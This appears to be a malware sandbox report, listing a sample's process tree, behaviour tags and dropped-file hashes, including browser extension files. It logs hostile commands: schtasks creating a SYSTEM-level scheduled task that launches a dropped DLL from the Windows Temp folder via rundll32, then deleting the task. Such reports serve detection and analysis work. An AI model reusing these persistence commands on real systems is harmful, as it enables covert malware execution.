-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "qOGoknXFjgYYIAZcs" /SC once /ST 07:56:51 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\UnkSsAUmPJldPerG\YkpANnYY\yzwOmgd.dll\",#1 /ZHWZdidzDd 385137" /V1 /F2⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:3124
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "qOGoknXFjgYYIAZcs"2⤵PID:2444
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "NDvladDJhDVrRoudV"2⤵PID:1176
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3120 -s 22562⤵
- Program crash
PID:3640
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 3780 -ip 37801⤵PID:3464
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\UnkSsAUmPJldPerG\YkpANnYY\yzwOmgd.dll",#1 /ZHWZdidzDd 3851371⤵PID:3256
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\UnkSsAUmPJldPerG\YkpANnYY\yzwOmgd.dll",#1 /ZHWZdidzDd 3851372⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:3716 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "qOGoknXFjgYYIAZcs"3⤵PID:4240
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 620 -ip 6201⤵PID:4784
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 3120 -ip 31201⤵PID:2684
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5ed5ea9f9b287e4fbc727c394357e586d
SHA1743073a0c7006a3eea316be44b92d453e5208a00
SHA2568fffadb7669848d52394f602b5b5148aec1de314f975b0ad75f6f6074a0cae09
SHA512aa71177392acd0b4ce54ed24315d1a5f02cd4a6c272369ab7ab50d45833a97dc38bdb4e4bd284f3d7a5606972b218e9c29d2b467c3d2925cae492ec9fd59e4cb
-
Filesize
2KB
MD52c9e916f6cc2805846a795699b7962e4
SHA121852c3b78518833bad369fad947003ab6e80388
SHA2567b115127031d6455f0e09e8d5e66c4ebf761cb97b48f4e226b2cc9f7a78c3d36
SHA51286087faa6500ac63ab12a01fe770045b1e27c798e9cb3cdc3ac06a4a3339244c39aece5f9901d125b58d303a01fc6230ca15d8fffe2a208ec140f520c7e3b71e
-
Filesize
2KB
MD5dab9ec9626b059dd9275aea8dd0b661f
SHA114498bce3397d1a225aafaa4bda6f5efdea2c0f7
SHA256084e6f59e3a45cc00e0ed3d156fa1dc3eb6cc9a421467c77a48a140aae532cb8
SHA5129855217de9aeed6ffa7820c3083901358af7ca64bf7ca53c1749a766c81b1465a51c33179361b366f09244774e7e89e14c78125da8c75dff2b000e17c2b05de4
-
Filesize
2KB
MD5024e8fed5af3def988adc9e529327052
SHA1c0426346c6bebd07bde1baeb1313a6d1d22bdb04
SHA2562852dc9b03b47abfc70342eda3444a184529103f45fb6dde14f3c669262303a0
SHA5122e2d45fe0bc979e55fb0bfd3df04296801f01e413dd0d334e5ff7c2631ae17485acc6b3ccf0ef50b9b2c73925a9a9027d2862e963b1022d7f28cd21bf57fbf1e
-
Filesize
2.0MB
MD5023c15a6732b057930799b398941246e
SHA19be4793661e3dec93ddc83f144ff8087229d6c31
SHA25670908a58e4b55096b9b7d340d3cf0cbc9cda306f426c03cd85a3f38755b5aabf
SHA5121e0ad8f70dd38fd4e3e34f2f3d0d100251dd21963a7737416a8c99bf3add1612cba0d7cef2fe1c317ee7532b6a921843457dd603d39e0ac8fd56a3aa1c1d0798
-
Filesize
2KB
MD572f96feb415f0e2af5ef27a4be12abc2
SHA1cd966d69b09f27a91f77d4d3549277b68ab51360
SHA2568043477f879464d1591051e82f754c2451cf4865ba95978ac705bbfa70a24b6e
SHA5121be8ff2963b77f1707a51b527f1feeaab371e13ab5e0af03cd595b032014b89aad6c7d650dcf293d4b8588d8dba61a4c14f95abe0d82083378e9a4438cce3bb7
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json
Filesize187B
MD52a1e12a4811892d95962998e184399d8
SHA155b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA25632b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json
Filesize136B
MD5238d2612f510ea51d0d3eaa09e7136b1
SHA10953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA5122630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json
Filesize150B
MD50b1cf3deab325f8987f2ee31c6afc8ea
SHA16a51537cef82143d3d768759b21598542d683904
SHA2560ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA5125bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f
-
Filesize
11KB
MD503a1046795d3a7ca80d03234f651754a
SHA182f4091ffc99484f334ce8b1ed6878489686024e
SHA2560516a126dd013f5ec8723df2400b4e64b26fae1ec5e6b04893cc41de00ccf974
SHA512a6a3065ef24036105bee5ec98365f2895b179e95fd4d4de831789ac841f8371cd8925674877a9c4914bb2c9bfc63ba4cc21d13a2f2d08f787d681194f95b67f7
-
Filesize
36KB
MD57ae1f312c02ce4b1aea19c41b52db7f9
SHA1504f212eb16340f0fa6b674ad686a401b5d790fe
SHA256e57dbeedf2d989a4d01cb23e8051f4f65c6ea7740d448b29a744d38bf802e3ae
SHA512386e7d42c6a0896e582a946bda5613108f1614ad1cd8394d1bf1051076eb1f01ad1c32347993c48915f4cc36b6a2ae0f407aa6c90dd12c0977d0b53b2b5bcfec
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\geiolieogaichbpfhcannipendgnnbkn\1.0.1_0\_locales\es\messages.json
Filesize151B
MD5bd6b60b18aee6aaeb83b35c68fb48d88
SHA19b977a5fbf606d1104894e025e51ac28b56137c3
SHA256b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55
SHA5123500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b
-
Filesize
11KB
MD5cd20a34242be276235b9c8b048c5c75c
SHA1ae7160e02d9ec7e6fc8a679d0c22a1425f1e84f9
SHA256f60d7555276208d2dda0a662c4bdfb609f8580bb2dbd44be888294c4856dc4a6
SHA512e75edeac2929b533dd7cfb6935f429a37a484d53ad7e876672dc13e4d5e4282c5d4116d82b438115d0bdfe1debeb23ba7b4834505660ebe3d9c1d913bd0b0250
-
Filesize
6.4MB
MD59aacd3c6118b342488554bcdfac1ed45
SHA1aaf45e2d8e3d833a4dba007abb668bb37a0ae05b
SHA25693d9189aaffc787c0ae2e5d2a541fa8851b31de8ead7426ce7e498671c0b8487
SHA512661f22f4512fdc9365cf7a34e2a4afcd4b9dc71ecdc393ee735e34745381cc5e78c355458bfcc8e9a12bb9d08735da287a6341b017283282357ff128c5d6d9ea
-
Filesize
6.7MB
MD54e81ccb99ab43afcc530be391250fa8c
SHA14e24a959af2cae6385338123a45a5b78ee78088c
SHA2562880c6c6f2109f95d39a827f4f265842e108c7b6124af685052940e0bec7f754
SHA512f0937814bcd987e85c16f32add008b8c888f9ec036833f503371abd6bbd4b3533a88ba5ed1bd2052dac4b6be6d6477c1a80c886dcee8c201ba4bb12d3a28691f
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
7KB
MD5666209a71b9834568993d91d7ed8dd02
SHA189f96ed16530d0295f0db07d9631c4342a33b2dc
SHA2569ae45ef6070f2f83bed67064f9f8167497642bbacc697bf2662fdd09365f0e48
SHA5122e7320e999583cf6244021dbdceaefb095caec5bb35c47490e6af4850702b7678b12f8ac7994436d51900f6a4ced81b301ccaff1dabb8c8b38a63c623b22454a
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize1KB
MD533b19d75aa77114216dbc23f43b195e3
SHA136a6c3975e619e0c5232aa4f5b7dc1fec9525535
SHA256b23ced31b855e5a39c94afa1f9d55b023b8c40d4dc62143e0539c6916c12c9d2
SHA512676fa2fd34878b75e5899197fe6826bb5604541aa468804bc9835bd3acabed2e6759878a8f1358955413818a51456816e90f149133828575a416c2a74fc7d821
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize11KB
MD5d313c9a2b3a3e81e8481bb045f731753
SHA1b839ae5b7267fa1ab3aa0aef6e120585d3837fe4
SHA2564685bfdfc9ba0cb6c7123c8da609d73b32aa42389fa265c55666407d9c97ddf9
SHA5128b7c795df95cdf9a74ba55f5e1adde6abc7d4950b13d6b16d9d0936f613588ce32648cd7de3ac3e4f4317e5706f6d4710464965e3b24901cff8eed08119d98a9
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize11KB
MD5c51e751de6a78d33a621a4730a4d4daa
SHA10810ddc85756b5368c33d3febf8f9d30781369d5
SHA256f19f8b2c6fbf8b35155797be8189c1531cf98264eba09b1421406a675939a2ec
SHA512d6e6abf3978e0e1478e28907e0f758005118bf22f415c56204fffbf57fb77ad2800d79a5fae0266c078cc158223f1abd12749f901d6c0ff4bdc3e64cb16134f5
-
Filesize
6.5MB
MD50289d22df1ba2617a18dcf81be4e9ea4
SHA1f7c7a5961181693e81716d2b3a58f1687e564fbd
SHA256e6a814f962c7b1ac003fe7e933e2b110ba521226a3299abbd8474560063ae3ba
SHA51272b601cf2baffca7b52f995f27c67debc8e6b04755fbfa478251a1b7b5b63f94f9f94d8cb770c7cae859ad58f93f3ad20d55979c6d0db9439d35e0555cd94afd
-
Filesize
6KB
MD5ada7457e483f19c0de8a9a43f1ec1efb
SHA1ceab7c68ec18c38b631ad62ba3e3bd89c2e13942
SHA2568ff5678ab14f8f375abfd13e68b292766b3316e079f10d90116e77ea8c59489d
SHA512fd5b26a9b27a017251dc163832e0609949ddc7b6d5d380fcc03744f5d2cdf4d507419f3503ffd1faa17033bc26a145f591b0054f348ff8d3e7e77d5f21e0fb03